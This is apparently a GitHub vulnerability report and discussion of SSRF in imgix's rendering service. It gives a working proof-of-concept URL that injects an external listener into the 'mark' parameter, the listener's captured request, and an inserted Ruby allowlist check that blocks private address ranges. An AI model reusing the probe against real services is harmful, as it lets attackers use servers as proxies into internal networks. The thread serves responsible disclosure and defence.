
ssrf external service interaction to malicious external source - security issue #120

Closed
anwibugc opened this issue Oct 28, 2022 · 8 comments

Comments

@anwibugc

Hi Imgix Team,

I have found a security vulnerability issue w.r.t. one application utilizing the imgix framework.

Vulnerability description & attacker scenario:

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Steps to Reproduce

1. Create a listener instance for ssrf external interaction purposes: access the site https://webhook.site/ in incognito mode; it will create a listener for ssrf interaction such as https://webhook.site/#!/{{some random id}}

2. Copy the url of the listener, https://webhook.site/#!/{{some random id}}, from the created listener

3. Paste the listener url for ssrf, https://webhook.site/#!/{{some random id}}, into the vulnerable parameter mark:

https://images.pexels.com/photos/1168981/pexels-photo-1168981.jpeg?fit=&h=&mark=https://webhook.site/#!/{{some random id}}&markalign=&txt=&txtalign=&txtclr=&txtfont=&txtshad=&txtsize=&w=

4. Curl request that is generated from the imgix application server to the webhook application listener; this data is from the interaction logs of the webhook listener:

curl -X 'GET' 'https://webhook.site/9554d7ba-d76b-49f0-8fd9-ac1d480f4a77' -H 'connection: close' -H 'user-agent: imgix/2.0' -H 'accept-encoding: gzip' -H 'x-imgix-cache: MISS' -H 'x-imgix-hops: 1' -H 'x-imgix-id: 9d6c3a806cc8f1d43b714831abbc3d1617939d02' -H 'accept: /' -H 'host: webhook.site' -H 'content-length: ' -H 'content-type: '

You will see the interaction on the https://webhook.site/#!/ website.

Proof of Concept - Steps to reproduce

1. Access the affected url with the ssrf interaction url injected in the mark parameter in the query string

[Screenshot: ssrf 1]

2. Interaction happened with the listener

[Screenshot: ssrf 2]

Business Impact

The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

More details around the vulnerability:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
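The OWASP cheat sheet linked above recommends validating a user-supplied URL against a hostname allowlist and blocking private address ranges before the server fetches it. The following is an added example of such a check for a `mark`-style overlay parameter, written for this thread and not code from imgix or the imgix-rails project; the `mark_url_allowed?` name, the allowlist and the injectable resolver are assumptions made so the check can be exercised offline.

```ruby
require "uri"
require "ipaddr"
require "resolv"

# Address ranges a render server must never fetch from on behalf of a client
# (constructed list for this example; extend with your own internal ranges).
BLOCKED_NETS = %w[
  0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
  192.168.0.0/16 100.64.0.0/10 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

# Default resolver does a real DNS lookup; tests inject a stub instead.
DNS_RESOLVER = ->(host) { Resolv.getaddresses(host) }

# Decide whether a user-supplied overlay URL (the `mark` parameter in the
# report) may be fetched. Returns [allowed, reason].
# allowed_hosts: hostnames this deployment trusts (hypothetical allowlist).
# resolver: callable returning the host's IP addresses as strings.
def mark_url_allowed?(raw, allowed_hosts:, resolver: DNS_RESOLVER)
  uri = URI.parse(raw.to_s)
  # Only https: anything else (http, file, gopher, ...) is refused outright.
  return [false, "scheme"] unless uri.is_a?(URI::HTTPS)
  host = uri.host.to_s.downcase
  # Allowlist first: an attacker-controlled host like the webhook listener
  # in the report never reaches the network.
  return [false, "host"] unless allowed_hosts.include?(host)
  # Even an allowlisted name can resolve to an internal address (DNS
  # misconfiguration or rebinding), so check every returned address.
  addrs = Array(resolver.call(host))
  return [false, "unresolvable"] if addrs.empty?
  addrs.each do |addr|
    begin
      ip = IPAddr.new(addr)
    rescue IPAddr::InvalidAddressError
      return [false, "bad address"]
    end
    return [false, "private address"] if BLOCKED_NETS.any? { |net| net.include?(ip) }
  end
  # The fetcher must connect to one of these checked addresses and re-run
  # this check on every redirect hop, otherwise the result can be bypassed.
  [true, "ok"]
rescue URI::InvalidURIError
  [false, "unparseable"]
end
```

Logging the reason string on every rejection gives a cheap detection signal: a burst of "host" rejections against one parameter is exactly the probing pattern described in this report.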

@anwibugc
Author

anwibugc commented Oct 28, 2022

@luqven , please review this security issue.

@sherwinski
Contributor

Hey there @anwibugc and thanks for bringing this to our attention. I've gone ahead and forwarded this to the relevant team for review and planning out any mitigation steps as deemed necessary.

@anwibugc
Author

anwibugc commented Nov 1, 2022

Hi Team,

Hope you are doing well.

Any update for this?

@sherwinski
Contributor

Hey @anwibugc, I believe the team is actively looking into this. I'll be sure to follow up here with any updates as I receive them.

@anwibugc
Author

anwibugc commented Nov 9, 2022

Hi @sherwinski @luqven,

Any update for this?

@anwibugc
Author

@sherwinski @luqven

Hi Team,

Still no tag or assignee for this issue?

Please check once.

@sherwinski
Contributor

sherwinski commented Nov 14, 2022

@anwibugc let me follow up with the team again.

@heyitsbryanm

Hi @anwibugc - can you email support@imgix.com and reference this thread? We'd like to get more information from you so we can investigate further.

In the meantime, we're going to close this issue because it's not an imgix-rails issue. It's an issue with our Rendering API.
